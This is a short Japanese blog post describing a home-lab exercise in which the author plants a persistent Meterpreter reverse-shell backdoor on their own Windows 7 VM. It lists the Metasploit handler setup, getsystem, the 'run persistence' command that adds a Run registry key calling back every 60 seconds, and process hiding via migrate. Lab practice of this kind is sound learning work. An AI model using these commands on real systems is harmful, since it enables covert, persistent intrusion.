Metasploitで自動起動型のバックドアを仕掛けてみた(対象Win7)

参考文献:IPUSIRON著「ハッキング・ラボのつくりかた」を参考に、
自環境のWindows7に自動起動型のバックドアを仕掛けてみました。

1.環境
Kali Linux:192.168.0.15
Windows7(IE8)64bit:192.168.0.26

2.手順

Metasploitの起動
msfconsole

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.0.15

exploit

Windows7側の操作

evil64.exeをWクリックする。

Kali側でWindowsの操作ができるようになります。

getuid
getsystem -t 1
getuid

run persistence -X -i 60 -P windows/x64/meterpreter/reverse_tcp -p 4444 -r 192.168.0.15

実行が成功すると、Windows7側にC:\Users\IEUser\AppData\Local\Temp\zsiLZnhhbo.vbs
が設置され、レジストリ:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
には TlUcLhbidFXCPZP というキーが登録され、即座にvbsが実行されます。
Windows7のリブート後も自動起動されるようになります。

タスクマネージャーのプロセス一覧では
RLoLlqkBXWBI.exeが実行されているのが分かります。

60秒に1回Windows7からKaliに接続を試みるようになり、
kali側でListenしていなければWindowsのイベントログ(アプリケーション)に
アプリケーションエラーが60秒毎に記録されます。

migrate [PID]

でタスクマネージャーに表示されるプロセスが隠蔽されると、
Windows7リブート後もプロセスの隠蔽は反映されます。

3.まとめ
どうやってバックドアが仕掛けられるのか体験することができました。
プロセスの隠蔽まで出来るのは驚きでした。
4章Windowsのハッキングを一通り終えることが出来ました。
IPUSIRON著「ハッキング・ラボのつくりかた」はすごい本です。

Comments are closed.